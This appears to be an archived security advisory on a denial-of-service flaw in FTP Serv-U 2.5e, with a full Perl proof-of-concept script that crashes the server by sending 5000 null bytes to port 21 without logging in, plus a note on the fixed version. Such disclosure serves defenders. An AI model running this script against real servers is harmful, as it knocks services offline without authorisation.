COMMAND

    servu

SYSTEMS AFFECTED

    FTP Serv-U 2.5e

PROBLEM

    Blue  Panda  found  following.    Sending  FTP  Serv-U  a   string
    containing a  large number  of null  bytes will  cause it to stack
    fault.    The   system   Serv-U   is   running   on   may   become
    sluggish/unstable and  eventually bluescreen.   A valid  user/pass
    combination  is   not  required   to  take   advantage  of    this
    vulnerability.

    Proof of concept:

    #!/usr/bin/perl
    #
    # FTP Serv-U 2.5e denial-of-service
    # Blue Panda - bluepanda@dwarf.box.sk
    # http://bluepanda.box.sk/
    #
    # ----------------------------------------------------------
    # Disclaimer: this file is intended as proof of concept, and
    # is not intended to be used for illegal purposes. I accept
    # no responsibility for damage incurred by the use of it.
    # ----------------------------------------------------------
    #
    # Crashes FTP Serv-U 2.5e by sending it a string of null bytes.
    #

    use IO::Socket;

    $host = "ftp.host.com";
    $port = "21";

    print "Connecting to $host:$port...";
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, =
    PeerPort=>$port) || die "failed.\n";
    print "done.\n";

    $counter = 0;
    $buf = "";
    while ($counter < 5000) {
            $buf .= "\x00";
            $counter += 1;
    }
    print $socket "$buf\n";

    sleep(4);
    close($socket);

SOLUTION

    A fix has been released.   FTP Serv-U 2.5f is immune.   Same seems
    to apply to Serv-U 2.5d.  This exploit doesnt work on Serv-U  2.5e
    (2.5.5.2) on Windows 2000 professional With SP1.